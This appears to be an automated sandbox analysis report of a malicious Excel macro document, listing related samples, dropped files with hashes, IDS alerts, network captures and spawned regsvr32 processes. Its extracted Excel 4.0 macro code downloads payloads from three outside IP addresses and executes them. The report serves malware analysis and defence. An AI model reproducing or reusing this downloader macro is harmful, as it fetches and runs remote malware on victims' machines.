                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                xa6FEoUw0W.dllGet hashmaliciousBrowse
                • 188.116.36.211
                tszs3mwUbe.exeGet hashmaliciousBrowse
                • 185.45.193.29
                pZ50mMKSLi.exeGet hashmaliciousBrowse
                • 185.45.193.29
                qTnwCotzR9.exeGet hashmaliciousBrowse
                • 185.45.193.29
                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                • 185.45.193.29
                aGDehjYIws.exeGet hashmaliciousBrowse
                • 185.198.57.204
                Tjhsm8p85Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                T23HJFoN2Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                i7NsO9mhTD.exeGet hashmaliciousBrowse
                • 185.45.193.29
                o7w2HSi17V.exeGet hashmaliciousBrowse
                • 185.141.27.225
                AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                xax2K3BWhm.exeGet hashmaliciousBrowse
                • 185.45.192.246

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D80F52D.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                C:\Users\user\AppData\Local\Temp\6CCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664485795476707
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4O4:cng4P4346PgZw9gQap
                MD5:85279074A41AD1C9174C9D03F19810B3
                SHA1:C4DBBDABD114B05AA56E8E00F9826B4868E2561F
                SHA-256:A48F6F68FA335FC5F5E84F57EDFEA73F577D234EE34D13810596283484A1633B
                SHA-512:BB369D87F0CBCB16D9B2B0974E1281BF0B8C3E870D7579DD55AB74C5DF7C0837865843F4F0B492AA4C183BBA351C91D1FCF113D689F6C62B642C5195B5393E41
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:24:37 2021, atime=Sat Jun 26 00:24:37 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.491100138549876
                Encrypted:false
                SSDEEP:12:85Qe+LgXg/XAlCPCHaXtB8XzB/WRlvX+WnicvbOdlbDtZ3YilMMEpxRljKiTdJP8:85I/XTd6jOxYeqvDv3q/rNru/
                MD5:BAAA1630EE771E146B0F7217074B5678
                SHA1:860C29F3299C61D700AB162973658C866F68B27E
                SHA-256:F45EBB66634B7D43E9F45E331E551A00314D32FD01A4FF762CEE5123282FC0DC
                SHA-512:3D8F8F945ED7C034A4791BF3969220D9C02E7623AC80651888CAFDE7C7F63F87BEC9D74644E12B2E850718D3CCD94CADFBC1BB6F7AA40CB3989ECCDEC080DDEF
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G...2..*j...2..*j... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-1532161794-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Sat Jun 26 00:24:37 2021, atime=Sat Jun 26 00:24:37 2021, length=153117, window=hide
                Category:dropped
                Size (bytes):2238
                Entropy (8bit):4.530521818280758
                Encrypted:false
                SSDEEP:48:8Zk/XT0jkK1RDJZ66R8/Qh2Zk/XT0jkK1RDJZ66R8/Q/:8Zk/XojkKWl/Qh2Zk/XojkKWl/Q/
                MD5:2FF094BE869E4C4FB1771A372D0AB4CB
                SHA1:CBA265A3449CEA0B7BD4D287681CA7EBA0DD59C8
                SHA-256:7AAF5F8953CE366C55150FA2748294CE39ABB7B7D6EF4A2E6C9293FDEFDFBFD4
                SHA-512:5CECA516F781A44DD0EC2789447C032C66F1FFE001EA9B7F189A48721EC689FA12817CAB3C2A116866AACB638D77495F0186E0FF41059C74758129954C8CE95F
                Malicious:false
                Reputation:low
                Preview: L..................F.... .....w..{...o~.*j...2..*j...V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...R.. .PERMIS~1.XLS..t.......Q.y.Q.y*...8.....................P.e.r.m.i.s.s.i.o.n.-.1.5.3.2.1.6.1.7.9.4.-.0.6.2.5.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Permission-1532161794-06252021.xlsm.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.1.5.3.2.1.6.1.7.9.4.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):145
                Entropy (8bit):4.723147476288188
                Encrypted:false
                SSDEEP:3:oyBVomxW+LxbLgIVTAXsUltLxbLgIVTAXsUlmxW+LxbLgIVTAXsUlv:djHbMoTAZ/FbMoTAZabMoTAZ1
                MD5:2B794DCA717665E095522B867972E337
                SHA1:E4C6872AF74D6866D0ECD036AAC3D400FB1C26B8
                SHA-256:AC0912D3AA6518006F9468C464A706D473CE49DDA61B0B553CAE5713F17B660C
                SHA-512:8F12A3A19EB076EAFAF6D71B07E869DAB6EB112B7CE9735868E736065B3242E0A2D5ADFBFFA01FDB0635A780B82E590B349010444F7A0CF161228BD57C2808B5
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-1532161794-06252021.LNK=0..Permission-1532161794-06252021.LNK=0..[misc]..Permission-1532161794-06252021.LNK=0..
                C:\Users\user\Desktop\FCCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664485795476707
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4O4:cng4P4346PgZw9gQap
                MD5:85279074A41AD1C9174C9D03F19810B3
                SHA1:C4DBBDABD114B05AA56E8E00F9826B4868E2561F
                SHA-256:A48F6F68FA335FC5F5E84F57EDFEA73F577D234EE34D13810596283484A1633B
                SHA-512:BB369D87F0CBCB16D9B2B0974E1281BF0B8C3E870D7579DD55AB74C5DF7C0837865843F4F0B492AA4C183BBA351C91D1FCF113D689F6C62B642C5195B5393E41
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Permission-1532161794-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666395274852154
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-1532161794-06252021.xlsm
                File size:153750
                MD5:bff78ca6421651b824c41ff73cd63a4d
                SHA1:8a439fe82292dfb61092daa32af6f0152400f002
                SHA256:b4c8a880fae666add98f9a871210d75f7addd4a00a334fb758c791c5ad1d3711
                SHA512:728a7ba287c987f67b480e07d8d947f784c51516743c17dfd5737eb9f4be958b2526452011418bc97c77fc1ff43f35e9bb6d5835d605b3905c96452392d5f183
                SSDEEP:3072:ymKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:J4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-1532161794-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                06/25/21-18:25:14.440139TCP1201ATTACK-RESPONSES 403 Forbidden8049167190.14.37.3192.168.2.22
                06/25/21-18:25:14.809690TCP1201ATTACK-RESPONSES 403 Forbidden8049168185.183.99.120192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 25, 2021 18:25:10.814660072 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:10.901743889 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:11.410449028 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:11.499355078 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:12.003333092 CEST4916580192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:12.093991041 CEST8049165185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:12.095508099 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:12.185947895 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:12.689728022 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:12.781727076 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:13.298177004 CEST4916680192.168.2.22185.240.103.219
                Jun 25, 2021 18:25:13.387892008 CEST8049166185.240.103.219192.168.2.22
                Jun 25, 2021 18:25:13.424767017 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:25:13.634337902 CEST8049167190.14.37.3192.168.2.22
                Jun 25, 2021 18:25:13.634708881 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:25:13.636249065 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:25:13.846219063 CEST8049167190.14.37.3192.168.2.22
                Jun 25, 2021 18:25:14.440139055 CEST8049167190.14.37.3192.168.2.22
                Jun 25, 2021 18:25:14.440251112 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:25:14.454608917 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:25:14.516675949 CEST8049168185.183.99.120192.168.2.22
                Jun 25, 2021 18:25:14.516835928 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:25:14.517451048 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:25:14.579385996 CEST8049168185.183.99.120192.168.2.22
                Jun 25, 2021 18:25:14.809689999 CEST8049168185.183.99.120192.168.2.22
                Jun 25, 2021 18:25:14.810095072 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:26:19.444881916 CEST8049167190.14.37.3192.168.2.22
                Jun 25, 2021 18:26:19.446012974 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:26:19.810117960 CEST8049168185.183.99.120192.168.2.22
                Jun 25, 2021 18:26:19.810364008 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:27:10.731702089 CEST4916880192.168.2.22185.183.99.120
                Jun 25, 2021 18:27:10.732223034 CEST4916780192.168.2.22190.14.37.3
                Jun 25, 2021 18:27:10.795295954 CEST8049168185.183.99.120192.168.2.22
                Jun 25, 2021 18:27:10.942275047 CEST8049167190.14.37.3192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.3
                • 185.183.99.120

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167190.14.37.380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 18:25:13.636249065 CEST1OUTGET /44372.7671056713.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.3
                Connection: Keep-Alive
                Jun 25, 2021 18:25:14.440139055 CEST2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:25:14 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168185.183.99.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 18:25:14.517451048 CEST2OUTGET /44372.7671056713.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:25:14.809689999 CEST3INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:25:29 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:18:24:35
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fe00000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >